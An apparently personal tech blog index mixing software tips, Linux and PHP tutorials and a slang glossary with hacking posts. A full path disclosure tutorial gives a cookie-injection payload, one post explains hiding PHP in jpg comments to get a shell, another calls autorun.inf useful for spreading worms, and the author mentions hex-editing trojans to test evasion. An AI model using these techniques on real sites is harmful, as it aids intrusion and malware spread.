Download Helper - Download videos from youtube, facebook and almost any site

Today, I found a new mozilla addon that I can use to download any videos, audio and photo galleries easily from any site including but not limited to youtube, facebook, myspace, etc.

DownloadHelper is a tool for web content extraction. Its purpose is to capture video and image files from many sites.

Just surf the Web as you are used to, when DownloadHelper detects it can do something for you, the icon gets animated and a menu allows you to download files by simply clicking an item

For instance, if you go to a YouTube page, you'll be able to download the video directly on your file system. It also works with MySpace, Google videos, DailyMotion, Porkolt, iFilm, DreamHost and others.

Since version 3.1, you can setup the extension to automatically convert the downloaded movies to your preferred video format.

When you are on a page containing links to images or movies, you can download some or all of them at once. Moving the mouse over the items in the menu will highlights the links directly in the page to make sure they are the ones you want to pick up.

DownloadHelper also allows you to download files one by one, so that you keep bandwidth to surf for other stuff to download.

To modify your preferences, like changing the download directory, right-click on the icon and choose "Preferences".

Download This Addon

Read more...

Toddler Keys- Protect your computer from children

Toddler Keys is a program that protect your computer from children by accident pressing wrong buttons or keys or mouse clicks.

It is a useful tool for parents that allows you to lock your computer keyboard, CD drive doors and power-off button. When the keyboard is used it will display images and play sounds every time a key is pressed, thereby preventing access to the desktop and applications, while adding some entertainment value for the kid.

To exit the locked screen, just type the word QUIT.

Download Toddler Keys

Go to Toddler Keys Home

Read more...

Finding more trackers to speed up torrents download

In this post, I'll give you the way of speeding of your torrent download by finding more trackers of your torrent.

A BitTorrent tracker is a server that assists in the communication between peers using the BitTorrent protocol. It is also, in the absence of extensions to the original protocol, the only major critical point, as clients are required to communicate with the tracker to initiate downloads. Clients that have already begun downloading also communicate with the tracker periodically to negotiate with newer peers and provide statistics; however, after the initial reception of peer data, peer communication can continue without a tracker.

The Torrentz.com site allows you to search for the torrent files and can be used to find all the trackers for the utorrent. The following steps describe how to find and add more trackers for speeding up your torrent download.

1) Go to Torrentz.com torrent meta-search engine.

2) Search whatever you need and open the suitable torrent from the results.

3) I assume you reach the page similar to the following.

In this page, search for the "You can get a µTorrent compatible list here." text. On clicking this link, you'll get the list of all the trackers for that file.

4) Now copy the whole trackers from the page.

5) In utorrent, double click the required torrent and you'll get the new child window. There in the General tab, you'll see trackers label.

6) Paste the trackers at the end of the label.

Do not worry about the duplicate trackers. This should increase the speed for your torrent file.
Have fun. :)

Read more...

Resetting uTorrent settings [Based on XP]

If you want to delete all the uTorrent settings and torrents, you can use this method. I've tested this in Windows XP and it should be similar in other OSes except that the utorrent folder might be placed in different folders.


* Note: This will delete all the torrents and settings of utorrent.

Go to your

C:\Documents and Settings\<username>\Application Data

folder in the file explorer.

Note that Application Data is the hidden folder so you might need to turn on visibility of the hidden files and folders from the folder options

There, you will see a folder utorrent. Delete this folder and all your utorrent settings will be reset.
Have fun. :)

Read more...

Online Virus Scanners [Multi Scanners]

If you get suspicious with any file in your PC and want to scan it with multiple antivirus engines, you don't have to go on downloading and installing all the antivirus tools but you can use online alternatives for this purpose.

There are few online service that enables you to scan suspicious files with several anti-virus programs. Some of them are:

a) Novirusthanks.org: This one is what I use and I use it for testint the trojan and malware codes after my hex editings. Go to Novirusthanks Multi-Engine Scanner

b) Virustotal.com: Another multi-scanning online service. Go to VirusTotal Multi-Engine Scanner

c) Jotti's malware scan: Never tried this myself... Go to Jotti's Multi-Engine Scanner

I hope you find this post useful... :)

Read more...

Download the full website [Complete Offline Mirroring]

This post will show you how to download the full website and have the complete offline mirror of any website you want.

wget

wget is the Linux terminal command that can be used as a not-interactive network retriever. This tool can be used to download the full website using the switch -r for recursive download.
The command for the complete mirroring is as belows:

wget -r -p http://www.techgaun.blogspot.com

or

wget -mr http://www.techgaun.blogspot.com

If you want to mirror without following to the other sites link, you can enter the command as:

wget -mrnp http://www.techgaun.blogspot.com

If you are on windows, you can use wget for windows from HERE

Using other tools

There are several tools available for making the offline copies of any website.
One of them is HTTrack website copier which is licensed under GPL. You can download this software from HERE

Another such tool is BlackWidow which can be used to scan a site and create a complete profile of the site’s structure, files, external links and even link errors. BlackWidow will download all file types such as pictures and images, audio and MP3, videos, documents, ZIP, programs, CSS, Macromedia Flash, .pdf , PHP, CGI, HTM to MIME types from any web sites. You can download this software from HERE

Have fun.. :)

Read more...

Collection of the internet Lang/slang words

This page lists many of the acronyms used in the digital world. Originally taken from some other site and full credit to that site.

0-9
1337 (written in ASCII) - From the word Leet, derived from the word elite
2 - too, or to
4 - For

A
AFAICR/S/T - As far as I can recall / remember / see / tel
AFAIK - As far as I know
AFK - Away from keyboard
ANFSCD - And Now For Something Completely Different. Used to change the subject of conversation.
ASAP - As soon as possible
ASL - Age / sex / location
ATEOTD - At The End of the Day
ATM - At the moment
AWOL - Absent Without (Official) Leave
AYBABTU (also abbreviated as AYB) - All your base are belong to us (from the video game Zero Wing)

B
B2B - Business to Business
B& and/or B7- Banned
BBIAB - Be back in a bit
BBL/S - Be back later / shortly / soon
BCNU - Be seein' you
Blog - Also known as web log or an online journal
BOFH - ~censored~ operator from hell
Bot - Any type of automated software in chatrooms and web-cataloging software
BRB - Be right back
BSOD - Blue Screen of Death
BTDT - Been there done that
BTW - By the way
Bump - Increment (For example, C's ++ operator.)or a backronym for "Bring Up My Post"

C
Crawl - To retrieve a web page along with the hyperlinks that reference it
Crapplet - A poorly written computer application
CU - See you (later)
CYA - See ya OR Cover Your Ass
Cyber (prefix) - A term used to connect the subsequent word loosely to the world of computers or the Internet or sex over a computer
Cyberspace - Virtual reality, the Internet, the World Wide Web, and other kinds of computer systems. Science fiction author William Gibson popularized the term in his novel Neuromancer. Gibson used the word to describe a virtual world of computer networks that his cyberpunk heroes 'jacked into'

D
DFTT - Don't feed the trolls
DGAF - Don't Give A ~censored~
DIAF - Die in a fire
DILLIGAF/D/S - Does it look like I give a flip / ~censored~ / damn / ~love~
DND - Do not disturb
DOA - Dead on arrival. Refers to hardware that is broken on delivery.

E
EOF - End Of File
EOM - End of Message
EOL - End of Life. Device or hardware that is at the end of its product life cycle.
EQ - EverQuest
ETA - Estimated time of arrival

F
FAQ - Frequently Asked Question(s)
FFS - For ~censored~'s sake
Flamer - Someone who makes inflammatory, abusive or directly offensive comments. Similar to, but not quite the same as an Internet troll[3]
FMCDH - From My Cold Dead Hands
FOAD - ~censored~ off and die
FOAF - Friend of a friend
FTL - For the loss
FTW - For the win
FU - ~censored~ you
FUBAR - ~censored~ up beyond all recognition / repair (from military slang; pronounced "foo-bar")
FUD - Fear, Uncertainty and Doubt (the purposeful spread of misinformation)
FWIW - For what it's worth
FYI - For your information

G
GBTW - Get back to work
GF - Great/good fight/girlfriend
GFU - Good for you
GFY - Go ~censored~ yourself
GG - Good game, used at or near the conclusion of a gaming match
GJ - Good job, often used in online gaming when a teammate performs an act benefitting his team, such as killing an opponent or enabling that kill
GMTA - Great minds think alike
Godwin's Law - Dictates that the longer a thread, the more likely someone will post a comparison involving Nazis or Hitler
Gratz - Congratulations
GTFO - Get the ~censored~ out
GTG or G2G - 'Got to go' or 'Good to go'
GR -Good Race
GR8 - Great

H
HAND - Have A Nice Day
Handle - Name used in online chat, (AKA nick(name), alias, screen/user name)
HF - Have fun
Haxor or H4x0r (1337) - Hacker
Hit - A request made to the web server, (noun) the results of an internet search, (verb) loading a Web page. Hits are not equivalent to visitors of a webpage.
Home page - The website's introduction page, starting point, and guide. The technical term is "index"
Hot list - A collection of publicly available URLs (World Wide Web site addresses), sometimes available as text files.
HTH - Hope this / that helps
H8 - Hate

I
IANAL - I am not a lawyer
IBTL - In before the lock
IDC - I don't care
IDK - I don't know
IIRC - If I recall / remember correctly
IIUC - If I understand correctly
IMO/IMHO/IMNSHO/IMAO - In my (humble / honest / not so humble / arrogant) opinion
Information superhighway - The Internet (AKA: I-way, infobahn)
IONO - I don't know
IOW - In other words
IRC - Internet Relay Chat
IRL - In real life
ITYM - I Think You Mean
IWSN - I want sex now
IYKWIM - If you know what I mean

J
Jaggy - Aliased computer graphics
JK or j/k - Just kidding, or joke
JFGI - Just ~censored~/Freaking Google It

K
k or kk - OK
KISS - Keep it simple stupid.
KS(ing) - Kill-Steal(ing)
KOS - Kill on sight
KTHX - OK, thanks
KTHXBAI or KTHXBYE - OK, thanks, goodbye, used either to cut short a conversation or to express displeasure with being cut short

L
L2P - Learn to play; an admonishment to MMORPG players who are incompetent and/or whine
L8R - Later, L8R also sometimes abbreviated as L8ER is commonly used in chat rooms and other text based communications as a way of saying good bye.
Lag - Slang term for slow Internet speeds or high Internet latency; Lag is sometimes due to a server problem, but more frequently due to the connection between client and server. A slow or intermittent connection may often be referred to as laggy
Lamer - A know-nothing, one who is lame.
Leet - Often spelled as l33t or 1337 in ASCII form. It originally meant elite
LFG - Looking for group
LFM - Looking for more
LM(F)AO - Laughing my (frigging) ass off
LMIRL - Let's meet in real life.
LMK - Let me know
LOL - Laughing out loud, laugh out loud
LTNS - Long time no see
Lurker - Someone who frequents a Usenet group without participating in discussions

M
MMORPG, MMO - Massive Multi-player Online Role Playing Game
MMOFPS - Massive Multi-player Online First Person Shooter
MOTD - Message of the day
MS - MapleStory, an MMORPG
MTFBWY - May The Force be with you
MUD - Multi-User Dungeon
MUSH - Multi-User Shared Hallucination
MYOB - Mind your own business
M8 - Mate

N
NE1 - "Anyone"
NFI - "No ~censored~ Idea"
Newbie, noob, or n00b - An inexperienced user of a system or game,or an annoying person.
NIFOC - Naked In Front Of Computer
NM - (Sometimes written N/M) Not much, Never mind or no message, used on message boards or in e-mails to indicate that everything is already said in the subject line.
NP - No problem
NSFW - Not safe for work. Warning about content that may get the viewer in trouble with his employer or co-workers.
NVM, NVMD, or nm - Nevermind, not much

O
O RLY - Oh really?
OIC - Oh, I see
OFN - Old ~censored~ news
OMG - Oh my god
OMFG - Oh my ~censored~ god
OMW - On my way or Oh my word
OP - Original poster / Operator / Outpost
OS - Operating system
OT - Off topic
OTOH - On the other hand
OTP - On the phone or One true pairing

P
P2P - Peer to peer, or pay to play
PAW - Parents are watching
PEBKAC/PEBCAK - Problem exists between keyboard and chair
Ping - From the popular network monitoring tool, used as a greeting similar to "Are you there?".
PITA - Pain in the arse / ass
PLMK - Please let me know
PMSL - Pissing myself laughing
POS - Piece of ~love~, or parent over shoulder.
POTS - Plain old telephone service
POV - Point of view
PPL - People
PTKFGS - Punch the Keys For God's Sake
pr0n - Intentional misspelling of porn
PW - Persistent World (gaming)
pwned - Intentional misspelling of owned

Q
QFT - Quoted for truth. Used on internet message boards to show agreement from a previous message


R
Rehi (or merely re) - Hello again
RL - Real Life[3]
RO(T)FL - Rolling on (the) floor laughing
RO(T)FLMAO - Rolling on (the) floor laughing my ass off
RO(T)FLOL - Rolling on (the) floor laughing out loud
RSN - Real soon now (used sarcastically)
RTFB - Read the ~censored~ binary (or book)
RTFS - Read the ~censored~ source
RTFM/RTM - Read the (~censored~) manual

S
SCNR - Sorry, could not resist
sk8/sk8r - skate/skater
Smiley - Another name for emoticons
SMH - Shaking my head
SNAFU - Situation normal: all (~censored~/[3]fouled) up
Snail mail - Normal paper mail service
SOHF - Sense of humor failure
Spider - The program behind a search engine
STFU - Shut the ~censored~ up
STFW - Search the ~censored~ web

T
TANSTAAFL - There ain't no such thing as a free lunch
TBF - Time between failures
TBH - To be honest
TG - That's great
TGIF - Thank god it's Friday
TH(N)X, TNX or TX - Thanks
TIA - Thanks in advance
TINC - There Is No Cabal, a term discouraging conspiracy theories
TMI - Too much information
TOS - Terms of service
TTBOMK - To the best of my knowledge
TTFN - Ta ta for now
TTT - To the top, used in forums to bump a thread
TTYL - Talk to you later (also spelled TTUL, T2UL or T2YL)
TTYTT - To Tell You The Truth
Tweedler - One who has deep love for all computer related technology and gadgets
TWIMC - To Whom It May Concern
TY - Thank you
TYT - Take your time
TYVM - Thank you very much

U
U - You
UTFSE - Use the ~censored~ search engine

V

W
w00t, w00T or WOOT - First two express exuberance, the latter is a backronym for the term "We Own the Other Team".
W/ or W/O - With or without
WB - Welcome back
W/E - Whatever
WRT - With respect / regard to
WTB - Want to buy
WTF - What the ~censored~
WTG - Way to go
WTH - What the hell
WTS - Want to sell
WTT - Want to trade
WUG - What you got?
WoW - World of Warcraft (game)
WUBU2 - What (have) you been up to?
WUU2 - What (are) you up to?
WYSIWYG - What you see is what you get
W8 - Wait
W-BB - warez-bb.org


Y
YARLY - Yeah Really
YHBT - You have been trolled
YKW - You know what?
YMMV - Your mileage may vary.
YTMND - You're The Man Now, Dog
YW - You're welcome.
YOYO- You're On Your Own.


Z
ZOMG - An intentional misspelling of the acronym shorthand for "Oh My God/Gawd" and pronounced "Zoh My God/Gawd" This version is mainly used in jest or to ridicule people who use abbreviations like OMG and OMFG

Read more...

Removing the unwanted programs from startup

Many programs such as messengers and other utilities stick up to the startup. Because of the increase in the number of startup items in your system, the startup process might become slower gradually. Also, sometimes unnecessary programs and even virii and worms might be in the startup so it can come handy when you need to speed up your system.

There are different locations from where a program can run at startup. You can refer to my previous post HERE for the startup related information.

All the startup items entries is made on the microsoft configuration utility called msconfig which can be accessed by running the msconfig command through run box. Switch to the startup tab in the msconfig utility window which lists all the programs and shortcuts that run at the startup in the background.

From here, you can remove the unnecessary programs and virus/worms startup by unchecking them. Just be careful to work correctly and note that many virus/worms have the filename similar to that of the windows system files so you'll have to be careful while editing the startup from here.

Have fun. :)

Read more...

Basic Linux Commands For Beginners [Part I]

I thought I would be sharing the different linux commands from basic to advanced so that the new linux users will be benefited so I'm starting this post and I'll continue to post more commands. This is the first one with the most basic commands to use in terminal.

Note that the linux commands are case-sensitive so be careful with the case while executing the commands.

cd

Command to change directory

cd /home: This changes the current working directory to /home. The '/' indicates the path relative to root, and the directory will be changed to "/home", no matter what directory you are in when you execute this command.

cd samar: This changes the current working directory to samar, relative to the current location which is "/home". The full path of the new working directory is "/home/samar".

cd ..: This moves to the parent directory from the current directory. Hence on executing this command, our new directory will be "/home".

cd ~: This changes the current directory to the user's home directory which is "/home/samar" for the user "samar". The ~ indicates the home directory of the currently logged in user.

ls

List the files and folders present in the current directory

ls: List the files and folders in the current working directory except those starting with . and only show the file name.

Using the different switches such as ls -lia, ls -al would output other more information such as ownership, chmod info, etc. of the files in the current directory.

cat

concatenate files and send the contents to the standard output. This command comes quite handy in many cases and with the use of the redirection, we can send the contents to other outputs such as files and others.

cat /etc/passwd: sends the file content of the file "/etc/passwd" to the standard output i.e. monitor.

cat /etc/passwd>/home/samar/Desktop/pass.txt: writes the content of the "/etc/passwd" file to the "/home/samar/Desktop/pass.txt" file.

cat file1 file2 > file3.txt: concatenates the content of "file1" with that of "file2" and writes to "file3.txt"

For now, I will leave you to do some study on these commands. You can use man page or info to find more about these commands(I'll leave it for you to research). Have fun. :)

Read more...

Checking MD5 sum of file in Linux

Linux offers a command line tool called md5sum which can be used to find the md5 checksum of the files in LINUX.

The info md5sum displays the following information about this command.

File: *manpages*, Node: md5sum, Up: (dir)

MD5SUM(1) User Commands MD5SUM(1)

NAME
md5sum - compute and check MD5 message digest

SYNOPSIS
md5sum [OPTION] [FILE]...

DESCRIPTION
Print or check MD5 (128-bit) checksums. With no FILE, or when FILE is
-, read standard input.

-b, --binary
read in binary mode

-c, --check
read MD5 sums from the FILEs and check them

-t, --text
read in text mode (default)

The following two options are useful only when verifying checksums:
--status
don't output anything, status code shows success

-w, --warn
warn about improperly formatted checksum lines

--help display this help and exit

--version
output version information and exit

The sums are computed as described in RFC 1321. When checking, the
input should be a former output of this program. The default mode is
to print a line with checksum, a character indicating type (`*' for
binary, ` ' for text), and name for each FILE.

AUTHOR
Written by Ulrich Drepper, Scott Miller, and David Madore.

REPORTING BUGS
Report bugs to .

COPYRIGHT
Copyright (C) 2008 Free Software Foundation, Inc. License GPLv3+: GNU
GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

SEE ALSO
The full documentation for md5sum is maintained as a Texinfo manual.
If the info and md5sum programs are properly installed at your site,
the command

info md5sum

should give you access to the complete manual.

GNU coreutils 6.9.92.4-f088d-dirtJanuary 2008 MD5SUM(1)



Read more...

Running firefox inside firefox

This is not a useful thing but still is a fun trick to show to your friends.

Just paste the following code in your mozilla firefox address bar and hit ENTER to see the new firefox inside the firefox.

chrome://browser/content/browser.xul

View the screenshot below to see how it looks like:

Read more...

Batch to C Converter

This small snippet of C source code converts the commands of batch (i.e. the commands you type in command prompt) into the C source code. It was compiled in Dev-CPP and is pretty basic. I hope some of you might find it useful. It just uses the system() command of stdlib.h header file.

Source code:

 /*********************************************  
 * Batch DOS To C Source Code Converter v.1.1 *  
 * Coded by Samar Dhwoj Acharya aka $yph3r$am *  
 * Website => http://techgaun.blogspot.com  *  
 * E-mail meh at samar_acharya[at]hotmail.com *  
 * I know to code: PHP, PERL, C, JAVA, PYTHON *  
 *********************************************/  
 //include header files...  
 #include <stdio.h>  
 #include <conio.h>  
 #include <stdlib.h>  
 #include <ctype.h>  
 #include <string.h>  
 int main()  
 {  
   FILE *fp;  
   char filename[30];     //filename for source code  
   // starting header of outputted file  
   char header[300] = "/*\nBatch DOS command To C Source Converter\nBy sam207 (samar_acharya[at]hotmail.com)\nhttp://www.sampctricks.blogspot.com\nhttp://nepali.netau.net\n*/\n";  
   //all the includes in output file  
   char incs[200] = "#include <stdio.h>\n#include <conio.h>\n#include <stdlib.h>\nint main()\n{\n";  
   //end part of output file  
   char end[50] = "\tgetch();\n}";  
   //for command  
   char cmd[150];  
   printf("\t+----------------------------+\n");  
   printf("\t|BATCH TO C SOURCE CONVERTER |\n");  
   printf("\t|CODED BY SAMARDHWOJ ACHARYA |\n");  
   printf("\t+----------------------------+\n");  
   printf("\nEnter the filename(with .c extension): ");  
   scanf("%s",filename);  
   fp = fopen(filename,"w");  
   if (fp==NULL)  
   {  
    printf("Some error occurred while opening file");  
    getch();  
    exit(1);  
   }  
   else  
   {  
     fprintf(fp,"%s%s",header,incs);  
     printf("\nNow start entering DOS commands: \n");  
     printf("When finished, type 'end' for the end of commands\n");  
     printf("\nStart:\n\n");  
     gets(cmd);  
     while (1)  
     {  
        gets(cmd);  
        if (!strcmp(cmd,"end"))  
          {  
          break;       //if end is typed, get out of loop  
          }  
        fprintf(fp,"\tsystem(\"%s\");\n",cmd);  
     }  
     fprintf(fp,"\tprintf(\"\\n\");");  
     fprintf(fp,"\n%s",end);  
     printf("\n\nFile successfully created");  
     printf("\nNow compile it with any C compiler");  
     printf("\nThanks for using this little app");  
     fclose(fp);  
   }  
   getch();  
 }     

Have fun :)

Read more...

Full path disclosure tutorial

Full path disclosure(FPD) is the revelation of the full operating path of a vulnerable script. Full Path Disclosure vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/samar/public_html/. FPD bugs are executed by providing unexpected characters to the vulnerable functions that will in return output the full path of the vulnerable script.

FPD bugs are often overlooked and are not considered as the security threat by many webmasters but that's not true. FPD might be useful for the hackers to determine the structure of the server and they can utilize it to perform other attacks such as file inclusion attacks or load_file() attacks via sql injection.

How to execute FPD
a) Nulled session cookie
Nulled session injection or illegal session injection is done by changing the value of session cookie to an invalid or illegal character.
Illegal Session Injection is made possible via changing the value of the session cookie to an invalid, or illegal character. The most common method is by injecting the NULL character to the PHPSESSID cookie. To inject a PHPSESSID cookie, use JavaScript injection via the URL bar:

javascript:void(document.cookie="PHPSESSID=");

On setting the PHPSESSID cookie value to NULL, we can see the result like:

Warning: session_start() [function.session-start]: The session id contains illegal characters,
valid characters are a-z, A-Z, 0-9 and '-,' in /home/samar/public_html/includes/functions.php on line 3

b) Array parameter injection(Empty array)
This is another common method of executing the full path disclosure vulnerabilities and usually works for me in many sites. There are different PHP functions which will output warning message along with the full path of the script such as htmlentities(), mysql_num_rows(), opendir(), etc.
We can exploit the $_GET variables... Lets take a simple example:

http://localhost/index.php?page=main

Now, lets exploit the $_GET['page'] variable which will look as below:

http://localhost/index.php?page[]=main

The full path disclosure can be prevented by turning off the display of errors either in php.ini configuration file or in the script itself:

php.ini

display_errors = 'off'

in php scripts

error_reporting(0);

//or

ini_set('display_errors', false);

Read more...

Nepali MP3 Songs Downloads [My Playlist]

Some of the nepali songs from my playlist, they are great songs to listen. If you need any other songs, request in this post and I shall try to find them for you.

Download different MP3 songs from the following folder:
Nepali MP3 collection

The songs available for the downloads are:
1) Amar rahos timro maya - phursang lama
2) Antim maya
3) bhoolmaa bhulyo - Robin
4) Bihana pahile ghaama udaune[patriotic song] - Sindhu Jalesa
5) Birsana - Aastha
6) Birshu Bhanchhu - Impulse 21 (confused :p)
7) Harpal tyo timro - Aastha
8) Malai bholi kei bhaye - Karna Das
9) Nabhana mero - Adrian Pradhan [1974 A.D.]
10) Pagal nabhana malai - The Edge
11) Prayas - The Edge
12) Sadhai sadhai
13) Samikshya - Vedh (confused again)
14) timi binaako jeevan
15) timilai odaidiyeko ghumto - sayas
16) Timro sparsa - Basan Shrestha

I'm confused with the name of singers of some songs(I usually don't try to know the artists)...
Enjoy my playlist. :)

Read more...

Edjpgcom - add comments inside a jpg image

We can sometimes exploit the image upload features and then use file inclusion vulnerabilities to get shell in a server. If the image upload form only allows the .jpg and other valid image files and you locate a local file inclusion vulnerability, you can upload the malicious jpg file containing the PHP code as the commment in it.

In order to add the comment easily inside the jpg images, we can use a small tool called edjpgcom, a jpg commenter. You can drag a jpg image to the edjpgcom icon which will open a window to add comment to the jpg image.

Download EDJPGCOM

Read more...

Making a autorun in Pen[USB] drive [autorun.inf]

In this post, I shall be writing about creating autorun file in order to run or execute any program from your pendrive. Autorun.inf is a special file that can contain the information regarding the icon for drive, autorun programs, etc.

Using autorun.inf can also be useful for running the virii and worms automatically from the USB drive.

How to:
1) Open notepad
2) Type the following:

[autorun]
Icon=default
label=[YourLabelHere]
open=targetprogramname.exe

This autorun.inf file now should be saved in the root directory of your USB drive and you'll have your autorun file... :)

Now let me say the way of changing icon of the drive. In order to change the icon of your USB drive, type the following in autorun.inf file.

[autorun]
icon=[youricon.ico]
label=[YourLabelHere]

That's all. :)

Read more...

Funny Google Tricks

In this post, I'm listing few funny google tricks I have learnt in the recent days. Though not so useful, they are something cool to know...

1) Hidden game from google:
- Go to http://www.google.com/Easter/feature_easter.html
You'll be able to play the hidden game offered by google. :)

2) Google reversed
- Go to Google homepage
On the search box, type google reverse or elgoog and press on I am feeling lucky button.
You'll see reversed google. :)

3) Find Chuck Noris
- Go to Google homepage
On the search box, type find Chuck Noris and press on I am feeling lucky button. See the result.. :p

4) Answer to life the universe and everything
- On the google homepage search box, type answer to life the universe and everything. You'll see the google's calculation of the answer to life the universe and everything.

5) Who's the cutest
- Go to google homepage
On the search box, type who's the cutest and press on I am feeling lucky button. You'll be so happy with the result... :P

6) Google epic
- Go to google homepage
On the search box, type google epic and press on I am feeling lucky button. Wait for a while and you'll see everything expanding in the page.

7) Google rainbow
- Go to google homepage
On the search box, type google rainbow and press on I am feeling lucky button. You'll reach the page with colourful texts.

Read more...

Replacing All Instances of a Word in string [PHP]

PHP offers a useful function called str_replace() that can be used to replace every instance of a word in a string. This function takes three compulsory arguments and one optional argument.

The first argument represents the string to be replaced, the second the replacement value and the third the target string. The function returns the modified string.

Example:

<?php
function replace($string)
{
    return str_replace("dog", "samar", $string);
}

$str = "I am dog so you call me dog";
echo $str;
echo "
".replace($str); //call replace function
?>

Output:
I am dog so you call me dog
I am samar so you call me samar

Now, what if you want to work with arrays of words to replace with, for instance, in the censoring tasks. You can write some PHP stuff as below to perform the task.

<?php
function badword_censor($string)
{
    $string = strtolower($string);
    $badwords = array("fuck","bitch","cunt","faggot","penis","vagina","dick","pussy");
// add as per your requirement
    $string = str_replace($badwords,"*censored*",$string);
    return $string;
}
$str = "Fuck you bitch.";
//echo $str;
echo "
".badword_censor($str);
?>

Output:
*censored* you *censored*.

Also, refer to the str_ireplace(), the case insensitive version of this function.
Hope this helps. :)

Edit: Thanks to cr4ck3r for the comments. Updated the post... :)

Read more...

EmailTrackerPro - Email tracking software for tracking the sender

eMailTrackerPro is the tool that can help you track down the email senders by analyzing the email headers. This tool is a product from the VisualWare Inc. which works in network assessment and connection analysis solutions.

eMailTrackerPro asks for the email header and all the tasks is done by this tool. eMailTrackerPro analyzes the email header to find the route or path of the email. And hence it helps to track down the email sender's IP address which can be very useful for dealing with spam emails.

In order to find the email header, you'll have to open the email in your inbox and there should be some location from where you can view the email header. For instance, Yahoo mail has the option called view full header in Actions tab when you're viewing the email(See the screenshot below).

Now, all you've to do is copy these email headers and let the eMailTrackerPro analyze the headers and provide you the IP address of the originating location.

The software will generate the report in HTML format too.

Go to eMailTrackerPro home

Have fun... :)

Read more...

Working with text case of PHP string

PHP provides number of functions to work with the case of the string. All these functions take the source string as their argument and return the modified string. The original source string will not be modified by any of these functions.

The PHP functions for working on case are:
strtolower() - Converts the entire string to lowercase

strtoupper() - Converts the entire string to uppercase

ucfirst() - Converts the first letter of the sentence to uppercase

ucwords() - Converts the first letter of every word in string to uppercase

<?php
//usage of ucfirst() function
$str = "i am samar";
$str = ucfirst($str);
echo $str;
?>

Output: I am samar

<?php
//usage of ucwords() function
$str = "i am samar";
$str = ucwords($str);
echo $str;
?>

Output: I Am Samar

<?php
//usage of strtoupper() function
//similarly use strtolower() function
$str = "i am samar";
$str = strtoupper($str);
echo $str;
?>

Output: I AM SAMAR

Read more...

Online Photo Editor - Lightweight web-based Alternatives to Desktop Photo Editors

With the ease in web access, internet users are using more and more online photo editing services available at different sites. And, I am also one of the regular users of the online photo editing service.

Though there exists several sites providing the free photo editing software, I have been using a single service available at www.pixlr.com.

The photo editing interface it provides is so similar to photoshop that it seems to be the lightweight version of the Adobe Photoshop.

Go to Pixlr.com Photo Editor

Hope this helps you. :)

Read more...

Online Hex Color Value Picker

For my raw HTML designs and other similar tasks, I do not keep on opening adobe photoshop or even the tiny color picker programs. Instead I depend upon the online color picking site in order to get the hex values of the colors I choose for my works.

ColorPicker.Com works perfectly fine for me for getting the hex color codes of the useful colours for me.

Go to ColorPicker.Com

Have fun with the online color picker. Hope this helps. :)

Read more...

GPRS/WAP Setting for Ncell

NCELL, the second biggest telecommunication company in Nepal is providing GPRS, EDGE and WAP services so that it users can surf the net easily using their capable handsets. This post is about how to activate and make setting of GPRS for NCELL provider.

By default, all the NCELL users have GPRS activated(that's what NCELL says). In case, your handset doesn't have the GPRS data transfer service activated, do one of the following:
1) Type A in message box and send the SMS to 900224. (note that you can type R and send the SMS to same number to deactivate the GPRS service.)

2) Dial *100# and follow the instructions

In order to get settings for your phone, type ALL and send SMS to 9595. Save the settings.

General settings for NCELL:
Access point name(APN): web
IP/Proxy IP: 192.168.19.15
Port: 9201 (For WAP1)/ 8080 (For HTTP or WAP2)

Read more...

Google sphere: google trick

In this post, I'm going to post a google trick which I read on another site. This trick is the google sphere animation.

First, open the webpage of google(http://www.google.com)
Now, in the search box, enter the text "google sphere" without quotes. Then, press on I'm feeling lucky.
You'll see the animating google sphere page.


Read more...

Mozilla Firefox Keyboard Shortcuts

Firefox is becoming more and more popular among the web browsers and this page lists the keyboard shortcuts that can be used with Mozilla Firefox.

F1     Opens Firefox help
F3     Find more text within the same webpage
F5     Reload the current webpage
F6     Toggles the cursor between the addressbar and current webpage
F7     Toggles Caret Browsing on and off.
       Used to be able to select text on a webpage with the keyboard
F11     Switch to Full Screen mode 
CTRL + A  Select all text on a webpage
CTRL + B  Open the Bookmarks sidebar
CTRL + C  Copy the selected text to the Windows clipboard
CTRL + D  Bookmark the current webpage
CTRL + F  Find text within the current webpage
CTRL + G  Find more text within the same webpage
CTRL + H  Opens the webpage History sidebar
CTRL + I  Open the Bookmarks sidebar
CTRL + J  Opens the Download Dialogue Box
CTRL + K  Places the cursor in the Web Search box
CTRL + L  Places the cursor into the URL box
CTRL + M  Opens your mail program to create a new email message
CTRL + N  Opens a new Firefox window
CTRL + O  Open a local file
CTRL + P  Print the current webpage
CTRL + R  Reloads the current webpage
CTRL + S  Save the current webpage on your PC
CTRL + T  Opens a new Firefox Tab
CTRL + U  View the page source of the current webpage
CTRL + V  Paste the contents of the Windows clipboard
CTRL + W  Closes the current Firefox Tab or Window
CTRL + X  Cut the selected text
CTRL + Z  Undo the last action

Read more...

TrueCrypt - Free open-source disk encryption software

TrueCrypt is a free open-source disk encryption software for Windows 7/Vista/XP, Mac OS X, and Linux which is capable of encrypting your hard disk efficiently. TrueCrypt performs on-the-fly encryption(OTFE) and is capable of creating a virtual encrypted disk within a file and mounting it as a real disk. It also can encrypt an entire partition or storage device such as USB flash drive or hard drive.

The encryption provided by TrueCrypt is automatic, real and transparent. You can read more about TrueCrypt in TrueCrypt's Documentation HERE.

You can download TrueCrypt from HERE.

Read more...

Fun Video - १० बर्षपछिको नेपाल(२०७५ B.S.)

सुप्रसिद्ध कलाकार मनोज गजुरेल अभिनित यो भिडियोमा मनोज गजुरेलको १० बर्षपछिको नेपालको परिकल्पना प्रस्तुत गरिएकोछ। भिडियोमा मनोज गजुरेलले नेकपा maawobaadi पार्टी प्रमुख प्रचन्डको भूमिका निवाएकाछन।

भिडियो डाउनलोद गर्ने link

This video is the fun video featuring the interview of Mr. Prachanda(Mr. Manoj Gajurel) in year 2075 B.S.

Download It From HERE

Read more...

KeyScrambler - A breakthrough in battling Keyloggers

Keyloggers are malware planted by cyber criminals along the crucial path to observe and record your keystrokes, a way to steal your private information so they can use it to steal your money from your bank accounts, open credit card accounts in your name, or assume your identity in other criminal pursuits.

KeyScrambler is an important security tool that works well as anti-keylogger tool and helps prevent people from getting hacked. This software encrypts your keystrokes deep in the kernel and decrypts back in the destination application and hence, keystrokes only catch the scrambled and meaningless keystrokes thus making the keylogging nearly impossible.

KeyScrambler is available in personal, professional and premium versions.

CLICK HERE TO GO TO DOWNLOAD PAGE

Read more...

Bypassing safe mode[Hack Windows Box]

Another old time video from me, this video demonstrates the exploitation of the windows server by the use of the shell. This video demonstrates few useful things you can do on the server you get access to.

